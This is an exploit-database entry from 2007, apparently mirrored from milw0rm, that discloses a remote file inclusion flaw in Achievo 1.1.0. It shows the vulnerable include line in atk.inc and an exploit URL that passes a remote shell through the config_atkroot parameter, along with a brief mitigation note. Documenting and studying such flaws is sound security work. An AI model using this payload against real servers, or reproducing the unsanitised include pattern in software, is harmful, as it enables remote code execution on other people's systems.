header-logo
Suggest Exploit
vendor:
Achievo
by:
Katatafish (karatatata@hush.com)
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Achievo
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Achievo 1.1.0(index.php) Remote File Include Vulnerability

The Achievo 1.1.0(index.php) version is vulnerable to Remote File Include. The vulnerability allows an attacker to include arbitrary remote files, resulting in remote code execution.

Mitigation:

The vulnerability can be mitigated by applying the latest patch or upgrading to a newer version of Achievo.
Source

Exploit-DB raw data:

## Achievo 1.1.0(index.php) Remote File Include Vulnerability ##

#Found by : Katatafish (karatatata@hush.com)

#Download http://www.achievo.org/files/achievo-stable-1.1.0.tar.gz

# File: ./atk.inc
 include_once($config_atkroot."atk/modules/class.atkmodule.inc");

# Exploit http://site.com/[path]/index.php?config_atkroot=SHELL

# milw0rm.com [2007-05-15]

Navigation

Suggest Exploit

Services By CQR